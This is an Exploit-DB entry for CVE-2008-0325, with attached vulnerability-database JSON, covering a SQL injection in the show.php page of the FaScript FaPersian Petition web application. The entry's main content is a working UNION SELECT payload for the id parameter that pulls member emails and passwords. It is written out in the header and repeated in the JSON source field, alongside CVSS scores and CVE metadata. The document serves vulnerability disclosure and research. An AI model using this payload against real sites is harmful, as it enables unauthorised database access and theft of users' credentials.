ID EDB-ID:4916
Type exploitdb
Reporter Khashayar Fereidani
Modified 2008-01-15T00:00:00
Description
FaScript FaPersian Petition (show.php) SQL Injection Vulnerability. CVE-2008-0325. Webapps exploit for php platform
#####################################################################################
#### FaScript FaPersian Petition Remote Sql Injection ####
#### BY IRCRASH ####
#####################################################################################
# #
#AUTHOR : IRCRASH (Dr.Crash) #
# #
#Script Download : http://fascript.com/fapersianpetition.zip #
# #
#Injection Adress : http://Sitename/fp/show.php?id=<SqL Code> #
# #
# #
#SQL For find Username and password : 999999'%20union/**/select/**/0,1,2,3,4,5,6,concat(0x3c62723e200d0a4c6f67696e3a,email,0x3c62723e200d0a50617373776f72643a,password),8,9,10,11/**/from/**/member/*
# #
# Our site : HTTP://IRCRASH.COM #
# #
#####################################################################################
# milw0rm.com [2008-01-15]
{"id": "EDB-ID:4916", "type": "exploitdb", "bulletinFamily": "exploit", "title": "FaScript FaPersian Petition show.php SQL Injection Vulnerability", "description": "FaScript FaPersian Petition (show.php) SQL Injection Vulnerability. CVE-2008-0325. Webapps exploit for php platform", "published": "2008-01-15T00:00:00", "modified": "2008-01-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4916/", "reporter": "Khashayar Fereidani", "references": [], "cvelist": ["CVE-2008-0325"], "lastseen": "2016-01-31T21:05:07", "viewCount": 5, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-01-31T21:05:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0325"]}], "modified": "2016-01-31T21:05:07", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://www.exploit-db.com/download/4916/", "sourceData": "#####################################################################################\n#### FaScript FaPersian Petition Remote Sql Injection ####\n#### BY IRCRASH ####\n#####################################################################################\n# #\n#AUTHOR : IRCRASH (Dr.Crash) #\n# #\n#Script Download : http://fascript.com/fapersianpetition.zip #\n# #\n#Injection Adress : http://Sitename/fp/show.php?id=<SqL Code> #\n# #\n# #\n#SQL For find Username and password : 999999'%20union/**/select/**/0,1,2,3,4,5,6,concat(0x3c62723e200d0a4c6f67696e3a,email,0x3c62723e200d0a50617373776f72643a,password),8,9,10,11/**/from/**/member/*\n# #\n# Our site : HTTP://IRCRASH.COM #\n# #\n#####################################################################################\n\n# milw0rm.com [2008-01-15]\n", "osvdbidlist": ["40359"], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:35:11", "description": "SQL injection vulnerability in show.php in FaScript FaPersian Petition allows remote attackers to execute arbitrary SQL commands via the id parameter.", "edition": 4, "cvss3": {}, "published": "2008-01-17T22:00:00", "title": "CVE-2008-0325", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0325"], "modified": "2017-09-29T01:30:00", "cpe": ["cpe:/a:fascript:fapersian_petition:*"], "id": "CVE-2008-0325", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0325", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fascript:fapersian_petition:*:*:*:*:*:*:*:*"]}]}